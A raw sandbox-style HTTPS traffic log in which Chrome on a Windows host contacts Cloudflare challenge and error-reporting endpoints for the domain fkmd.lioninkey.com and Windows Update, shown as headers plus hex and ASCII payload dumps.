                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 59 30 68 7a 59 56 61 41 58 6e 61 51 68 57 52 70 58 70 4b 55 54 4a 52 59 6d 48 74 38 66 4a 4a 72 68 34 42 76 63 36 43 43 64 49 57 68 71 48 70 6d 59 59 4e 6b 67 6d 57 46 73 5a 4f 4f 6a 71 61 68 6a 4b 69 75 69 36 35 31 71 5a 53 67 66 4c 4f 34 65 37 58 42 66 48 2b 78 6b 72 75 5a 79 73 4b 38 78 4c 32 6f 77 4d 57 47 79 6f 33 50 70 4b 75 5a 32 63 6d 57 74 72 4b 79 33 4e 72 52 7a 73 44 6b 30 61 69 38 32 36 76 66 33 4f 44 6a 75 39 48 54 73 2b 33 6a 30 2f 48 74 31 62 44 54 78 76 36 32 2b 37 2f 71 7a 2b 37 50 77 63 2f 58 76 75 50 48 32 4d 67 4e 79 4e 33 73 34 50 4c 51 35 50 45 45 34 2b 49 4a 48 50 54 78 31 78 66 7a 37 52 77 45 31 65 34 47 43 50 76 77 48 67 59 64 49 79 49 59 2b 41 67 6e 38 67 4c 77 37 79 72 79 39 7a 63 78 45 53 77 77 47 78 6b 71 50 7a 5a 44 52 69 38
                                                                                                                                                                                                                                                                                      Data Ascii: Y0hzYVaAXnaQhWRpXpKUTJRYmHt8fJJrh4Bvc6CCdIWhqHpmYYNkgmWFsZOOjqahjKiui651qZSgfLO4e7XBfH+xkruZysK8xL2owMWGyo3PpKuZ2cmWtrKy3NrRzsDk0ai826vf3ODju9HTs+3j0/Ht1bDTxv62+7/qz+7Pwc/XvuPH2MgNyN3s4PLQ5PEE4+IJHPTx1xfz7RwE1e4GCPvwHgYdIyIY+Agn8gLw7yry9zcxESwwGxkqPzZDRi8
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 46 78 58 69 47 74 74 55 57 4a 32 67 4a 4e 6c 65 6d 78 38 69 59 70 57 65 31 2b 41 61 6c 6c 65 6b 48 4b 6a 6e 4b 69 69 68 48 64 70 71 32 61 63 72 32 31 2f 6e 4a 61 57 64 33 65 4e 6f 33 75 51 74 4b 79 55 76 72 4f 43 72 71 43 2b 68 4d 4b 6f 78 70 69 4c 74 73 6d 5a 70 4a 6a 47 7a 73 4f 54 74 4e 65 57 72 35 66 46 32 70 4c 63 71 71 32 65 72 37 66 53 73 61 58 69 70 2b 47 67 32 64 2b 6a 76 4c 6e 5a 7a 38 6e 6d 72 4d 32 31 7a 4c 62 69 75 65 50 31 79 37 76 52 33 50 43 38 33 76 61 2f 38 74 6e 38 2f 50 55 43 44 63 58 63 35 77 2f 38 44 38 6e 69 38 41 76 67 46 41 62 36 36 76 76 30 36 76 45 65 44 79 41 67 34 64 30 6e 48 77 4d 58 49 66 66 6f 47 43 50 6d 34 53 50 73 42 51 66 71 49 79 38 78 45 79 38 37 39 54 6b 36 48 42 6f 2f 4d 79 34 63 4c 67 5a 41 50 77 4d 62 48 69 55 34
                                                                                                                                                                                                                                                                                      Data Ascii: FxXiGttUWJ2gJNlemx8iYpWe1+AallekHKjnKiihHdpq2acr21/nJaWd3eNo3uQtKyUvrOCrqC+hMKoxpiLtsmZpJjGzsOTtNeWr5fF2pLcqq2er7fSsaXip+Gg2d+jvLnZz8nmrM21zLbiueP1y7vR3PC83va/8tn8/PUCDcXc5w/8D8ni8AvgFAb66vv06vEeDyAg4d0nHwMXIffoGCPm4SPsBQfqIy8xEy879Tk6HBo/My4cLgZAPwMbHiU4


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      19192.168.2.164973035.190.80.14436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC537OUTOPTIONS /report/v4?s=fTRaBsChwjRBmyPySqJSGlLkGakMO5bb1fDM0C389eXCBtQ2y0KY2F9mxlAWX%2Bf3%2FoeGcoTyl0Ce51v3WbSPXIL%2B4C7tO2zV0brwPFmaLkSALTsFL7o4fdXbyDKHxQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Origin: https://fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                      Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                                                                                      access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                      access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                                                      date: Thu, 24 Oct 2024 22:05:50 GMT
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      20192.168.2.164973135.190.80.14436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:51 UTC476OUTPOST /report/v4?s=fTRaBsChwjRBmyPySqJSGlLkGakMO5bb1fDM0C389eXCBtQ2y0KY2F9mxlAWX%2Bf3%2FoeGcoTyl0Ce51v3WbSPXIL%2B4C7tO2zV0brwPFmaLkSALTsFL7o4fdXbyDKHxQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 430
                                                                                                                                                                                                                                                                                      Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:51 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 36 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 66 6b 6d 64 2e 6c 69 6f 6e 69 6e 6b 65 79 2e 63 6f 6d 2f 36 79 73 77 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                                                                                                                                                                                                                                                      Data Ascii: [{"age":0,"body":{"elapsed_time":161,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://fkmd.lioninkey.com/6ysw/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error",
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:51 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      date: Thu, 24 Oct 2024 22:05:51 GMT
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      21192.168.2.1649732104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:52 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-out: ERlMQ5xhdcS2Mcxao2nO3cxCK9eXgd/c/eM=$VKJCpeDaFsfsj3iN
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4550fba56b0a-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      22192.168.2.1649734104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8d7d45361ad96c58/1729807550390/Mp4zHOK1XWJgEfH HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:52 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d45528c59e75e-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 4f 08 02 00 00 00 1f 86 b0 a2 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR,OIDAT$IENDB`


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      23192.168.2.164973352.149.20.212443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+7WnBV4zh2d+Rfg&MD=NKxfPlDA HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                      MS-CorrelationId: 4ce9cc0e-b12d-4d0e-b8b3-287166922a67
                                                                                                                                                                                                                                                                                      MS-RequestId: 4789680f-ab61-46b9-a195-51acc94e8ad2
                                                                                                                                                                                                                                                                                      MS-CV: 2vwOoDukFkilruLS.0
                                                                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:52 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:52 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      24192.168.2.1649735104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8d7d45361ad96c58/1729807550390/Mp4zHOK1XWJgEfH HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:53 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d45574f003ac7-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 4f 08 02 00 00 00 1f 86 b0 a2 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR,OIDAT$IENDB`


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      25192.168.2.1649736104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8d7d45361ad96c58/1729807550392/4220556c1318bf1b7fb6ed3eff5519f4e1039a0300343b990bcf733826bdd4cb/f0mV01aRHabiiK- HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:53 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 1
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 51 69 42 56 62 42 4d 59 76 78 74 5f 74 75 30 2d 5f 31 55 5a 39 4f 45 44 6d 67 4d 41 4e 44 75 5a 43 38 39 7a 4f 43 61 39 31 4d 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gQiBVbBMYvxt_tu0-_1UZ9OEDmgMANDuZC89zOCa91MsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:53 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                                                      Data Ascii: J


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      26192.168.2.1649737104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 31484
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      CF-Challenge: ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC16384OUTData Raw: 76 5f 38 64 37 64 34 35 33 36 31 61 64 39 36 63 35 38 3d 49 4a 56 4e 6d 30 37 79 59 36 56 37 4a 64 45 6a 73 37 6d 66 51 78 36 37 72 66 2d 66 32 4e 64 36 37 51 66 70 65 30 4c 6c 37 39 66 30 65 30 45 66 4d 66 53 69 36 45 37 75 6b 47 66 64 58 66 64 79 66 41 56 4e 69 66 79 35 66 63 4a 37 55 57 42 6e 6a 45 66 71 4e 78 47 4a 66 41 47 31 73 36 66 79 65 37 35 66 6b 65 30 6c 64 73 64 6a 71 6a 6f 63 66 56 56 66 39 41 6c 61 58 51 6f 41 66 6a 70 38 75 42 43 78 78 66 66 64 53 66 64 4c 69 6a 34 69 37 67 7a 4e 66 6f 48 49 63 36 66 69 57 6c 24 66 6a 76 71 66 66 35 59 75 64 71 4c 69 66 73 4a 47 55 76 48 46 57 73 43 30 6d 4c 66 43 68 4b 6a 4e 66 70 4c 4e 66 4b 66 56 2d 76 4a 6c 33 45 35 4f 59 34 4a 6d 4d 79 75 68 74 78 66 63 59 6b 48 75 56 32 24 68 72 49 6f 62 4d 6c 4e 33
                                                                                                                                                                                                                                                                                      Data Ascii: v_8d7d45361ad96c58=IJVNm07yY6V7JdEjs7mfQx67rf-f2Nd67Qfpe0Ll79f0e0EfMfSi6E7ukGfdXfdyfAVNify5fcJ7UWBnjEfqNxGJfAG1s6fye75fke0ldsdjqjocfVVf9AlaXQoAfjp8uBCxxffdSfdLij4i7gzNfoHIc6fiWl$fjvqff5YudqLifsJGUvHFWsC0mLfChKjNfpLNfKfV-vJl3E5OY4JmMyuhtxfcYkHuV2$hrIobMlN3
